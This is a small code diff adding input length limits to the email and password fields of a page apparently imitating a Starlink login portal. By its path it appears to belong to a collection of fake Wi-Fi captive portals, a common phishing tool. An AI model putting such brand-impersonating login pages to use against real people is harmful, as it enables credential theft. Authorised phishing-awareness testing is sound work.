--- a/portals/isp/Starlink.html
+++ b/portals/isp/Starlink.html
@@ -44,10 +44,10 @@
                     <h1>Welcome</h1>
                     <h2>Please Enter your Details</h2>
                     <div class="form-group">
-                        <input name="email" type="text" class="form-control" placeholder="Email" required>
+                        <input name="email" type="text" class="form-control" placeholder="Email" maxlength="100" required>
                     </div>
                     <div class="form-group">
-                        <input name="password" type="password" class="form-control" placeholder="Password" required>
+                        <input name="password" type="password" class="form-control" placeholder="Password" maxlength="100" required>
                     </div>
                     <div class="form-group">
                         <button class="btn btn-primary" type="submit">Next</button>
